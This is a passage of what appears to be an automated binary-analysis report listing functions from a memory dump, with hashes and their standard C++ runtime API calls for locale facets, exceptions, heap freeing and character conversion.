Opcode ID: e1390838b764a5236f3fc8d54c623925e1e83075214bcca5f555afb06658cb94
Instruction ID: 5379e335cb7943bf93024828e80a1b306c7192e2a0354b798b4b247f66b3b47a
Opcode Fuzzy Hash: e1390838b764a5236f3fc8d54c623925e1e83075214bcca5f555afb06658cb94
Instruction Fuzzy Hash: 0BF0F43D508E0126DB0256399D08F2B26769FF67AAF37415DF61A92680EF398C0280B2

Uniqueness

Uniqueness Score: -1.00%

Function 6D479011, Relevance: 9.0, APIs: 6, Instructions: 33COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 6D47901D
__CxxThrowException@8.LIBVCRUNTIME ref: 6D47902B

Part of subcall function 6D4924F4: RaiseException.KERNEL32(?,?,?,6D4915E0,6D55AA10,6D55AA10,6D55AA10,?,?,?,?,?,6D4915E0,6D528C7C,6D531C84), ref: 6D492554

std::invalid_argument::invalid_argument.LIBCONCRT ref: 6D47903D
__CxxThrowException@8.LIBVCRUNTIME ref: 6D47904B
std::invalid_argument::invalid_argument.LIBCONCRT ref: 6D47905D
__CxxThrowException@8.LIBVCRUNTIME ref: 6D47906B

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: Exception@8Throwstd::invalid_argument::invalid_argument$ExceptionRaise
String ID:
API String ID: 2590316965-0
Opcode ID: 24b84a920771dbfe7581a91776ea1be60bf48a8b59ad12318e642cec34d55335
Instruction ID: e853d611abc77f117fb1495fa93b2d0f8dfa1243752263ca532ed9fdda3aa22b
Opcode Fuzzy Hash: 24b84a920771dbfe7581a91776ea1be60bf48a8b59ad12318e642cec34d55335
Instruction Fuzzy Hash: ADF01275C0424C77CF18EAF6D895CDDBB7CAA04104F814465AB10A6451EF71AB1DD7D1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C6222, Relevance: 7.7, APIs: 5, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd63963b42c2707cf47d777c01cc036530413bb1ee24246ab2dcb1eaea942323
Instruction ID: 59c9bfc6b0aa7a6701e9cf71c177da828ed1b7120ff8ddd4112a157fef5c3bf3
Opcode Fuzzy Hash: cd63963b42c2707cf47d777c01cc036530413bb1ee24246ab2dcb1eaea942323
Instruction Fuzzy Hash: 9871BF399042179BDB21CF59C844FBFBB75EF45314F258229E96467260DB708C42CBEA

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C8A45, Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6D508120), ref: 6D4C8AAF
WideCharToMultiByte.KERNEL32(00000000,00000000,6D540A64,000000FF,00000000,0000003F,00000000,?,?), ref: 6D4C8B27
WideCharToMultiByte.KERNEL32(00000000,00000000,6D540AB8,000000FF,?,0000003F,00000000,?), ref: 6D4C8B54
_free.LIBCMT ref: 6D4C8A9D

Part of subcall function 6D4C02CE: HeapFree.KERNEL32(00000000,00000000,?,6D4CC724,?,00000000,?,00000000,?,6D4CCA29,?,00000007,?,?,6D4CBDC8,?), ref: 6D4C02E4
Part of subcall function 6D4C02CE: GetLastError.KERNEL32(?,?,6D4CC724,?,00000000,?,00000000,?,6D4CCA29,?,00000007,?,?,6D4CBDC8,?,?), ref: 6D4C02F6

_free.LIBCMT ref: 6D4C8C69

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: 3a3f3d8f6a6a2c51f939c22875e575ad35381ad612fe2ee06a9c6d488356bf73
Instruction ID: 2b89349fec85de3f5a443b8285afcf0bb47ee99fe55d698883624f822fbcaf51
Opcode Fuzzy Hash: 3a3f3d8f6a6a2c51f939c22875e575ad35381ad612fe2ee06a9c6d488356bf73
Instruction Fuzzy Hash: 4151EBB9904209AFDF10DF6ACC84D7E77B8EF45314B22426FE56497690E7309E41CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6D48CF76, Relevance: 7.6, APIs: 5, Instructions: 71COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D48CF87
std::_Facet_Register.LIBCPMT ref: 6D48CFD8
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48CFF8
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48D016
_Mpunct.LIBCPMT ref: 6D48D049

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_MpunctRegisterThrow
String ID:
API String ID: 3611545457-0
Opcode ID: 948f3da73a5ab42383b73c139177c820eff39986b3a303f6891319c26d79f19f
Instruction ID: 3cda77f413a03b387522f7995ad9991772a050b0cafb8a2872b8494a2c626318
Opcode Fuzzy Hash: 948f3da73a5ab42383b73c139177c820eff39986b3a303f6891319c26d79f19f
Instruction Fuzzy Hash: 6121A93180425A9BCF05CFA5C840EEEBBB1AF84354F22440EEA14AB391DF70DE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D481118, Relevance: 7.6, APIs: 5, Instructions: 71COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D481129
std::_Facet_Register.LIBCPMT ref: 6D48117A
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48119A
__CxxThrowException@8.LIBVCRUNTIME ref: 6D4811B8
_Mpunct.LIBCPMT ref: 6D4811EB

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_MpunctRegisterThrow
String ID:
API String ID: 3611545457-0
Opcode ID: 2f87456b5d8d9912f162e3722e84bf38f9d2a59eff42c43dfa5ab054bd23b402
Instruction ID: 6420f1ee8e18ce224156004517cb5ab3ff3272c5042cc890e9c317a93406412b
Opcode Fuzzy Hash: 2f87456b5d8d9912f162e3722e84bf38f9d2a59eff42c43dfa5ab054bd23b402
Instruction Fuzzy Hash: B521BA758042199BCF15CFA4C840EEE7BB5AF89354F26040EEA24AB390DB70DE01CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D47911C, Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D47912D
codecvt.LIBCPMT ref: 6D479167
std::_Facet_Register.LIBCPMT ref: 6D47917E
std::_Lockit::~_Lockit.LIBCPMT ref: 6D47919E
__CxxThrowException@8.LIBVCRUNTIME ref: 6D4791BC

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowcodecvt
String ID:
API String ID: 324574759-0
Opcode ID: e99a8c89a8b5d2748eb17b2589cfae55cd0fce491789b0c762a94121f1c97e7b
Instruction ID: 645d249a41a9631d72cb5606b3d4857c1438540ce97310e87ab6846c44051db3
Opcode Fuzzy Hash: e99a8c89a8b5d2748eb17b2589cfae55cd0fce491789b0c762a94121f1c97e7b
Instruction Fuzzy Hash: D021C3729082299BCF14DF95C854EEE7779AF85764F22040DE601AB390DF759E01C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 6D47727A, Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D47728B
codecvt.LIBCPMT ref: 6D4772C5
std::_Facet_Register.LIBCPMT ref: 6D4772DC
std::_Lockit::~_Lockit.LIBCPMT ref: 6D4772FC
__CxxThrowException@8.LIBVCRUNTIME ref: 6D47731A

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowcodecvt
String ID:
API String ID: 324574759-0
Opcode ID: 5407325410a7a527bf1b44f60293f70f5ff5af0137a4e750f4a0b886aa52380e
Instruction ID: 0bd3d47f7ed6ddeda4de81d8ae610c9b0d9d70409925519696c9f92bf887b630
Opcode Fuzzy Hash: 5407325410a7a527bf1b44f60293f70f5ff5af0137a4e750f4a0b886aa52380e
Instruction Fuzzy Hash: FE21CFB1D082299BCF14DB95C850EEE77B5AF44214F22000EEA10AB390DF709E01CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D47BB3E, Relevance: 7.6, APIs: 5, Instructions: 64COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D47BB4F
numpunct.LIBCPMT ref: 6D47BB89
std::_Facet_Register.LIBCPMT ref: 6D47BBA0
std::_Lockit::~_Lockit.LIBCPMT ref: 6D47BBC0
__CxxThrowException@8.LIBVCRUNTIME ref: 6D47BBDE

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrownumpunct
String ID:
API String ID: 2501072427-0
Opcode ID: 1669d27aa2d8d7e715dbed35b4c2a0372379070c545e277fd7b3e86135e4e02e
Instruction ID: 8a6d1a5ecbb88621c7914215708fd4d5eb66293510f8b4186be49610b3d9ba94
Opcode Fuzzy Hash: 1669d27aa2d8d7e715dbed35b4c2a0372379070c545e277fd7b3e86135e4e02e
Instruction Fuzzy Hash: 4D11CA319042199BCF18CF64D844EEE7BB4BF85328F22441DEA14AB390DB74DE058BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48056C, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D48057D
ctype.LIBCPMT ref: 6D4805B7
std::_Facet_Register.LIBCPMT ref: 6D4805CE
std::_Lockit::~_Lockit.LIBCPMT ref: 6D4805EE
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48060C

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowctype
String ID:
API String ID: 1081823724-0
Opcode ID: c432740e7ce3ecffa8e7ce5014ea25b1d965276609fedf095828eba3bdba230c
Instruction ID: f48b6790a781b0bfba114ec4271584c4cf2c65701337db8361fc1e01497c0246
Opcode Fuzzy Hash: c432740e7ce3ecffa8e7ce5014ea25b1d965276609fedf095828eba3bdba230c
Instruction Fuzzy Hash: 5211AC72C042298BCF05DBA5C990EEE7775AF84364F26040DD611AB390EF34EE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48CD84, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D48CD95
moneypunct.LIBCPMT ref: 6D48CDCF
std::_Facet_Register.LIBCPMT ref: 6D48CDE6
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48CE06
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48CE24

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowmoneypunct
String ID:
API String ID: 158860062-0
Opcode ID: 169dedf51f5d0f82ac054f09c8c6978058cf34377111132661ad34b0c4d6ee92
Instruction ID: 6a4a3e08ded4054197777a8f02cf788b8b00b9d1e14d8a505385b4a4c52c1c2b
Opcode Fuzzy Hash: 169dedf51f5d0f82ac054f09c8c6978058cf34377111132661ad34b0c4d6ee92
Instruction Fuzzy Hash: 2C119A328042299BCF14DBA5C840EFE7B75AF85364F26050DD610AB391DF74EE418BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480420, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D480431
collate.LIBCPMT ref: 6D48046B
std::_Facet_Register.LIBCPMT ref: 6D480482
std::_Lockit::~_Lockit.LIBCPMT ref: 6D4804A2
__CxxThrowException@8.LIBVCRUNTIME ref: 6D4804C0

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowcollate
String ID:
API String ID: 86117490-0
Opcode ID: f346fb75506384176464aeb08b68611dbc3830018fd22625057d3dde33f21c6e
Instruction ID: bf2ccf3a0551a2146f17593b45fa2422438b2e61c61384e3bafa3a5d254fb74a
Opcode Fuzzy Hash: f346fb75506384176464aeb08b68611dbc3830018fd22625057d3dde33f21c6e
Instruction Fuzzy Hash: 3D11EC329042299BCF15DFA1C880EEE7775AF80764F26040DD611BB2A0DF30DE418BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4804C6, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D4804D7
collate.LIBCPMT ref: 6D480511
std::_Facet_Register.LIBCPMT ref: 6D480528
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480548
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480566

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowcollate
String ID:
API String ID: 86117490-0
Opcode ID: 39fe53d9a84223e915662a0862e69953a3564060f2a54ccd8ffd2a021565f28b
Instruction ID: 35853d34022c736bc9adaa1874975f74d622de95834dace82747b579904015f4
Opcode Fuzzy Hash: 39fe53d9a84223e915662a0862e69953a3564060f2a54ccd8ffd2a021565f28b
Instruction Fuzzy Hash: 3D11AC728046299BCF05DFA5C884EEE7775AF84368F26040DD614AB290DF34EE058BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480612, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D480623
messages.LIBCPMT ref: 6D48065D
std::_Facet_Register.LIBCPMT ref: 6D480674
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480694
__CxxThrowException@8.LIBVCRUNTIME ref: 6D4806B2

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowmessages
String ID:
API String ID: 447356255-0
Opcode ID: 3d333e042352d5b1308f0ef8bf65b45a651cd0ee9679d2fa82f1a104f3f4c2a1
Instruction ID: bf55b2ccaeb9bde9b5476912c0cd11da5956d0c329e2bdaf73b2ad1eeb8fe921
Opcode Fuzzy Hash: 3d333e042352d5b1308f0ef8bf65b45a651cd0ee9679d2fa82f1a104f3f4c2a1
Instruction Fuzzy Hash: 7A11A0328042199BCF05DB65C844EEE7775AF84354F2A040DD616BB390DF74DE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48CE2A, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D48CE3B
moneypunct.LIBCPMT ref: 6D48CE75
std::_Facet_Register.LIBCPMT ref: 6D48CE8C
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48CEAC
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48CECA

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowmoneypunct
String ID:
API String ID: 158860062-0
Opcode ID: 91452b926b02fe09204edfdb5baaebb95c3a019fc8e1e817282bd6f99ccbc297
Instruction ID: 673cb1e2456a296a382d523126225180c3ec358f0679807872fd1924a273018d
Opcode Fuzzy Hash: 91452b926b02fe09204edfdb5baaebb95c3a019fc8e1e817282bd6f99ccbc297
Instruction Fuzzy Hash: C3119A729042298BCF14DBA5C840EFE77B5AF84754F26010ED610AB391DF74EE419BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480E80, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D480E91
numpunct.LIBCPMT ref: 6D480ECB
std::_Facet_Register.LIBCPMT ref: 6D480EE2
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480F02
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480F20

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrownumpunct
String ID:
API String ID: 2501072427-0
Opcode ID: 3a234ae8d2625f3f6814d5e645d248dcb61e3a9983c5675b96d625a783e90026
Instruction ID: 9df684e113dfa27f0677b02a0ec607c5ea61fd674d176d0d83a8b29f93d3b353
Opcode Fuzzy Hash: 3a234ae8d2625f3f6814d5e645d248dcb61e3a9983c5675b96d625a783e90026
Instruction Fuzzy Hash: 0611A0329042199BCF15DF65C844EFE7775AF85354F26041DD6116B290DF74DE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4806B8, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D4806C9
messages.LIBCPMT ref: 6D480703
std::_Facet_Register.LIBCPMT ref: 6D48071A
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48073A
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480758

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowmessages
String ID:
API String ID: 447356255-0
Opcode ID: 78ac1076fa26bf45fafe6df12a1640ed719bd07d585b3a9411fbb709b65a5d4b
Instruction ID: 36659fa113f989637416a9e81e08acb4ad8f06632a8f18e2a956507b894c6d8f
Opcode Fuzzy Hash: 78ac1076fa26bf45fafe6df12a1640ed719bd07d585b3a9411fbb709b65a5d4b
Instruction Fuzzy Hash: CB119A329042698BCF15DBA5C884EEE7775AF84768F26041ED611AB290DF34DE01CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4809F6, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D480A07
moneypunct.LIBCPMT ref: 6D480A41
std::_Facet_Register.LIBCPMT ref: 6D480A58
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480A78
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480A96

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowmoneypunct
String ID:
API String ID: 158860062-0
Opcode ID: 3b7713bc617e64bcf42d1043b4f4f8b5a55bf65e6e5abccc8bf604e617f56a8f
Instruction ID: b21035272712467243b7f4e3958dcc3923e8df0d1bd56202bde803e3550932e6
Opcode Fuzzy Hash: 3b7713bc617e64bcf42d1043b4f4f8b5a55bf65e6e5abccc8bf604e617f56a8f
Instruction Fuzzy Hash: C011AC328041299BCF15DFA6C840EEE77B5AF84358F26440DD610AB291DF74EE028BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480B42, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D480B53
moneypunct.LIBCPMT ref: 6D480B8D
std::_Facet_Register.LIBCPMT ref: 6D480BA4
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480BC4
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480BE2

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowmoneypunct
String ID:
API String ID: 158860062-0
Opcode ID: b22674adcddd4f7ca0ee1961414124575ca3a12ea92b250425039b3bdff5b0c2
Instruction ID: dcc723c190bfc79ed722ede56f5d2dfb2289a093371cb7d3842c33cdab91b612
Opcode Fuzzy Hash: b22674adcddd4f7ca0ee1961414124575ca3a12ea92b250425039b3bdff5b0c2
Instruction Fuzzy Hash: F2119A728041698BCF15DBA5C884EEE7775AF85368F26080DE611BB2A0DF74DE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48037A, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D48038B
codecvt.LIBCPMT ref: 6D4803C5
std::_Facet_Register.LIBCPMT ref: 6D4803DC
std::_Lockit::~_Lockit.LIBCPMT ref: 6D4803FC
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48041A

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowcodecvt
String ID:
API String ID: 324574759-0
Opcode ID: 647b72f24ef8154aad12e132a8b52c56a68bd27abf08c229c282e7846524e63f
Instruction ID: 2f258415c9a8f746fcb9e5d6df13fc1a86bb0639220ee111e2f22b56d37eb188
Opcode Fuzzy Hash: 647b72f24ef8154aad12e132a8b52c56a68bd27abf08c229c282e7846524e63f
Instruction Fuzzy Hash: D511AC7290422A8BCF14DBA6C890EEE7775AF85764F26040DD610AB391DF74DE418BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480BE8, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D480BF9
moneypunct.LIBCPMT ref: 6D480C33
std::_Facet_Register.LIBCPMT ref: 6D480C4A
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480C6A
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480C88

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowmoneypunct
String ID:
API String ID: 158860062-0
Opcode ID: 17c619255c18b71b77515c0aa2dcf6448f7f865416d62d7222f870f8e7899223
Instruction ID: 1f4bdf154e9b70b017e5b69de2733d84f86e373b8fcc8f200a90fed21d123b15
Opcode Fuzzy Hash: 17c619255c18b71b77515c0aa2dcf6448f7f865416d62d7222f870f8e7899223
Instruction Fuzzy Hash: AC119A72904229CBCF19DFA5C884EEE7775AF85364F26080DE610AB2A0DF34DE018BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48CB92, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D48CBA3
messages.LIBCPMT ref: 6D48CBDD
std::_Facet_Register.LIBCPMT ref: 6D48CBF4
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48CC14
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48CC32

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowmessages
String ID:
API String ID: 447356255-0
Opcode ID: ebbdecfe602bc82e657915630c458349b6f06886b2c6c89da16d6b01a31d9bb4
Instruction ID: e4f4da627cea5d70f590c2cdc33763716322624db6d232ccd484656c287c18e9
Opcode Fuzzy Hash: ebbdecfe602bc82e657915630c458349b6f06886b2c6c89da16d6b01a31d9bb4
Instruction Fuzzy Hash: 6D11AC328042298BCF04DFA5C880EEE7775AF85364F26050EE611AB391DF74DE419BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480A9C, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D480AAD
moneypunct.LIBCPMT ref: 6D480AE7
std::_Facet_Register.LIBCPMT ref: 6D480AFE
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480B1E
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480B3C

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowmoneypunct
String ID:
API String ID: 158860062-0
Opcode ID: 323ecd5e2bed572ea63a9ae1573f48b712ba0917a30be212679592e31de3f1c9
Instruction ID: 159880a051bd0091e8134d7548f6d7eafc48328174261f07046a2a3989c3389d
Opcode Fuzzy Hash: 323ecd5e2bed572ea63a9ae1573f48b712ba0917a30be212679592e31de3f1c9
Instruction Fuzzy Hash: F511AC329042298BCF05DFA6C880EEE7775AF85368F26040DD611AB291DF74DE41CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4CC438, Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6D4CC450

Part of subcall function 6D4C02CE: HeapFree.KERNEL32(00000000,00000000,?,6D4CC724,?,00000000,?,00000000,?,6D4CCA29,?,00000007,?,?,6D4CBDC8,?), ref: 6D4C02E4
Part of subcall function 6D4C02CE: GetLastError.KERNEL32(?,?,6D4CC724,?,00000000,?,00000000,?,6D4CCA29,?,00000007,?,?,6D4CBDC8,?,?), ref: 6D4C02F6

_free.LIBCMT ref: 6D4CC462
_free.LIBCMT ref: 6D4CC474
_free.LIBCMT ref: 6D4CC486
_free.LIBCMT ref: 6D4CC498

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: f10d7b58bbe39dd218081843b1078a4602fc37290dd59879506204f52597c893
Instruction ID: 4d67c89da36e85a05af5071ede19e8db2b127fb059a4bd19b2c2f806b34427ef
Opcode Fuzzy Hash: f10d7b58bbe39dd218081843b1078a4602fc37290dd59879506204f52597c893
Instruction Fuzzy Hash: 76F04F7D50920597DF20DE65E581E2633E9AB056227738809F518EBB00D731FCC08AAA

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C2A87, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMON

Download Yara Rule

Strings

L<Km, xrefs: 6D4C2B86

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID:
String ID: L<Km
API String ID: 0-4252610374
Opcode ID: 59e0ecba0fd12e18b684743089c37dd0f249ff1982f4c4212aa115e2565e32dd
Instruction ID: 527e53a791ee1cc964f81fa84e191f59de085f45ab9be425f9c54236223fa4f7
Opcode Fuzzy Hash: 59e0ecba0fd12e18b684743089c37dd0f249ff1982f4c4212aa115e2565e32dd
Instruction Fuzzy Hash: 8651B879D5820A9FDF21CFA9C884FAE7BB4BF16314F115149E514A7250DFB09D01CB62

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C3F56, Relevance: 6.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,4D8A1055,?,00000000,00000000,?,?,?,?,00000001,?,4D8A1055,00000001,?,?), ref: 6D4C3FA3
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 6D4C402C
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,6D4B60DF), ref: 6D4C403E
__freea.LIBCMT ref: 6D4C4047

Part of subcall function 6D4C1817: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 6D4C1849

Memory Dump Source

Source File: 00000003.00000002.901782707.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 757e17827b2c4fe956b09aba4731e399595842ec85f8af8b708d8ff172e33a3f
Instruction ID: 05e0e09f78537c155c125e2a50027fdf50212e625966caf5ab1ab347b1616247
Opcode Fuzzy Hash: 757e17827b2c4fe956b09aba4731e399595842ec85f8af8b708d8ff172e33a3f
Instruction Fuzzy Hash: B7319D36A0020AABDF25CF66DC84EAE3BA5EB45254F114229EC18DB250E739DD51CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6D480D34, Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D480D45
std::_Facet_Register.LIBCPMT ref: 6D480D96
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480DB6
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480DD4

Memory Dump Source

